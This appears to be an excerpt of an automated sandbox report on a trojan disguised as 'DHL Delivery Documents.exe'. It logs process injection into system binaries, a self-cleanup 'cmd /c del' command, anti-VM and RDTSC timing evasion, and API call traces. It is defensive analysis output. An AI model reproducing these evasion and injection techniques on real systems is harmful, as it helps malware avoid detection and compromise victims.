          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01439610 NtEnumerateValueKey,7_2_01439610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014396D0 NtCreateKey,7_2_014396D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9540 NtReadFile,LdrInitializeThunk,12_2_054B9540
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B95D0 NtClose,LdrInitializeThunk,12_2_054B95D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9710 NtQueryInformationToken,LdrInitializeThunk,12_2_054B9710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9FE0 NtCreateMutant,LdrInitializeThunk,12_2_054B9FE0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9780 NtMapViewOfSection,LdrInitializeThunk,12_2_054B9780
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9650 NtQueryValueKey,LdrInitializeThunk,12_2_054B9650
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9660 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_054B9660
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B96D0 NtCreateKey,LdrInitializeThunk,12_2_054B96D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B96E0 NtFreeVirtualMemory,LdrInitializeThunk,12_2_054B96E0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_054B9910
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B99A0 NtCreateSection,LdrInitializeThunk,12_2_054B99A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9840 NtDelayExecution,LdrInitializeThunk,12_2_054B9840
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9860 NtQuerySystemInformation,LdrInitializeThunk,12_2_054B9860
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A50 NtCreateFile,LdrInitializeThunk,12_2_054B9A50
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9560 NtWriteFile,12_2_054B9560
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9520 NtWaitForSingleObject,12_2_054B9520
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BAD30 NtSetContextThread,12_2_054BAD30
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B95F0 NtQueryInformationFile,12_2_054B95F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9760 NtOpenProcess,12_2_054B9760
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA770 NtOpenThread,12_2_054BA770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9770 NtSetInformationFile,12_2_054B9770
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA710 NtOpenProcessToken,12_2_054BA710
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9730 NtQueryVirtualMemory,12_2_054B9730
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B97A0 NtUnmapViewOfSection,12_2_054B97A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9670 NtQueryInformationProcess,12_2_054B9670
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9610 NtEnumerateValueKey,12_2_054B9610
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9950 NtQueueApcThread,12_2_054B9950
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B99D0 NtCreateProcessEx,12_2_054B99D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BB040 NtSuspendThread,12_2_054BB040
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9820 NtEnumerateKey,12_2_054B9820
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B98F0 NtReadVirtualMemory,12_2_054B98F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B98A0 NtWriteVirtualMemory,12_2_054B98A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9B00 NtSetValueKey,12_2_054B9B00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054BA3B0 NtGetContextThread,12_2_054BA3B0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A00 NtProtectVirtualMemory,12_2_054B9A00
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A10 NtQuerySection,12_2_054B9A10
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A20 NtResumeThread,12_2_054B9A20
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054B9A80 NtOpenDirectoryObject,12_2_054B9A80
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03148720 NtClose,12_2_03148720
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031487D0 NtAllocateVirtualMemory,12_2_031487D0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031486A0 NtReadFile,12_2_031486A0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031485F0 NtCreateFile,12_2_031485F0
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314871A NtClose,12_2_0314871A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031487CA NtAllocateVirtualMemory,12_2_031487CA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314869F NtReadFile,12_2_0314869F
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314869A NtCreateFile,12_2_0314869A
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_031485EC NtCreateFile,12_2_031485EC
          Source: DHL Delivery Documents.exeStatic PE information: No import functions for PE file found
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297172945.0000000001360000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297081764.0000000000AD2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exe, 00000002.00000002.297200414.000000000139A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeBinary or memory string: OriginalFilenameBNCXGAS.exe0 vs DHL Delivery Documents.exe
          Source: DHL Delivery Documents.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: DHL Delivery Documents.exeVirustotal: Detection: 30%
          Source: DHL Delivery Documents.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL Delivery Documents.exe "C:\Users\user\Desktop\DHL Delivery Documents.exe"
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\DHL Delivery Documents.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@1/1
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5256:120:WilError_01
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: DHL Delivery Documents.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: DHL Delivery Documents.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: msdt.pdbGCTL source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: BNCXGAS.pdb source: DHL Delivery Documents.exe
          Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: .pdbBSJB source: DHL Delivery Documents.exe, 00000002.00000002.297160400.0000000001350000.00000004.08000000.00040000.00000000.sdmp, DHL Delivery Documents.exe, 00000002.00000002.297652300.0000000003B63000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000007.00000002.356998480.00000000014EF000.00000040.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000003.296854295.00000000010A0000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000C.00000002.608610032.000000000556F000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000002.602202907.0000000005450000.00000040.00000800.00020000.00000000.sdmp, msdt.exe, 0000000C.00000003.357056996.0000000005120000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: msdt.exe, 0000000C.00000002.620930532.0000000005987000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000C.00000002.596381462.0000000003775000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msdt.pdb source: aspnet_compiler.exe, 00000007.00000002.358011544.0000000002FC0000.00000040.10000000.00040000.00000000.sdmp

          Data Obfuscation

          barindex
          Source: DHL Delivery Documents.exe, BNCXGAS/Program.cs.Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C805 push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B832 push eax; ret 7_2_0041B838
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B83B push eax; ret 7_2_0041B8A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B8D3 push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B89C push eax; ret 7_2_0041B8A2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C130 push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C235 push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C367 push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041C31E push edx; ret 7_2_0041B9DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0040D438 push es; retf 7_2_0040D43F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_00414F52 push eax; ret 7_2_00414F53
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0041B7E5 push eax; ret 7_2_0041B838
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0144D0D1 push ecx; ret 7_2_0144D0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_054CD0D1 push ecx; ret 12_2_054CD0E4
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C31E push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C367 push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C281 push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C130 push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314C805 push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B832 push eax; ret 12_2_0314B838
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B83B push eax; ret 12_2_0314B8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B89C push eax; ret 12_2_0314B8A2
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B8D3 push edx; ret 12_2_0314B9DA
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_03144F52 push eax; ret 12_2_03144F53
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0314B7E5 push eax; ret 12_2_0314B838
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 12_2_0313D438 push es; retf 12_2_0313D43F
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeRDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 0000000003138614 second address: 000000000313861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exeRDTSC instruction interceptor: First address: 00000000031389AE second address: 00000000031389B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 2228Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exe TID: 6792Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 6.3 %
          Source: C:\Windows\SysWOW64\msdt.exeAPI coverage: 6.5 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.309195507.0000000008778000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000008.00000000.323844313.00000000067C2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000008.00000000.301405872.0000000000C10000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}osoft S
          Source: explorer.exe, 00000008.00000000.327847130.00000000086C9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: DHL Delivery Documents.exe, 00000002.00000002.297292575.000000000144A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_004088E0 rdtsc 7_2_004088E0
          Source: C:\Users\user\Desktop\DHL Delivery Documents.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]7_2_0141B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B944 mov eax, dword ptr fs:[00000030h]7_2_0141B944
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]7_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]7_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9100 mov eax, dword ptr fs:[00000030h]7_2_013F9100
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]7_2_013FB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB171 mov eax, dword ptr fs:[00000030h]7_2_013FB171
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FC962 mov eax, dword ptr fs:[00000030h]7_2_013FC962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov eax, dword ptr fs:[00000030h]7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01414120 mov ecx, dword ptr fs:[00000030h]7_2_01414120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]7_2_0142513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142513A mov eax, dword ptr fs:[00000030h]7_2_0142513A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014841E8 mov eax, dword ptr fs:[00000030h]7_2_014841E8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141C182 mov eax, dword ptr fs:[00000030h]7_2_0141C182
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142A185 mov eax, dword ptr fs:[00000030h]7_2_0142A185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422990 mov eax, dword ptr fs:[00000030h]7_2_01422990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]7_2_013FB1E1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FB1E1 mov eax, dword ptr fs:[00000030h]7_2_013FB1E1
